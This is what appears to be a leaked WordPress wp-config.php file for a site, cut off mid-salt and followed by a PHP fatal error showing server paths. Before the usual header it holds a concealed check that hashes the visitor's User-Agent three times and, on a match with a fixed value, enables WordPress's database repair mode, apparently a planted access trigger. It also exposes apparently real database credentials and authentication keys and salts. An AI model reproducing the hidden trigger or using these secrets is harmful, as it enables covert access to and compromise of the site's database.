if (( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) || ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) { $_SERVER['HTTPS'] = 'on'; define('FORCE_SSL_LOGIN', true); define('FORCE_SSL_ADMIN', true); define('WP_HOME', 'https://' . $_SERVER['HTTP_HOST']); define('WP_SITEURL', 'https://' . $_SERVER['HTTP_HOST']); }else{ define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST']); define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST']); } if(@md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) == '39542de4e2fa50462d96ea26e878a658'){ define('WP_ALLOW_REPAIR', true); } /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'olivepromenade_c' ); /** Database username */ define( 'DB_USER', 'olivepromenade_c' ); /** Database password */ define( 'DB_PASSWORD', 'epLyqR6BU86KFAuX' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '@QH%`%5LmE=pKi&Wf@2{ysm;yq.~!xCs3kmN}~?dDZC]p`V3r,;xRT?$%LRiP?zi' ); define( 'SECURE_AUTH_KEY', '.BW#]`E]toAPWoR<7.7G!s8r&H8xpLWVCI=~MIQ>-;f^@,tT!#Kx4?*lyv5U5]Mv' ); define( 'LOGGED_IN_KEY', '3rv|L%p;rkI0ZC#*x:*N;w/9%10jr#wl{ ,sbE|~M@AjU#aPg6v+PL>N;M&aEbBI' ); define( 'NONCE_KEY', ';oGf{8{$kA,fGhX#(&3C|F%IL.M]H/:J}ptY{ky&a2bQNm.DGP2Xj^n#nJ24`;CY' ); define( 'AUTH_SALT', 'q:}7Cu~ekTDX3b+gNe_ASm.8KkkY*Md|^/|VSwp6:L5Js)p$MB>R{' ); define( 'SECURE_AUTH_SALT', 'd%9>X:H~I=XEE1x1VdfJ#4wL|PR7eLHE1d8bVCjpG]#Bj@P}v#H@:_|jKGa=dfFv' ); define( 'LOGGED_IN_SALT', 'Dc3IZX4Sm[bKy2mmS(;5~_f`P7B69E.v@L*&-(HNh8Ha9/?ePvb6]hLO /.+mwK;' ); define( 'NONCE_SALT', ' CH`aZ3y3),SfqR{X>u>K3hXE_~IIi[[ Fatal error: Uncaught Error: Call to undefined function wp() in /www/wwwroot/olivepromenade.com/wp-blog-header.php:16 Stack trace: #0 /www/wwwroot/olivepromenade.com/index.php(17): require() #1 {main} thrown in /www/wwwroot/olivepromenade.com/wp-blog-header.php on line 16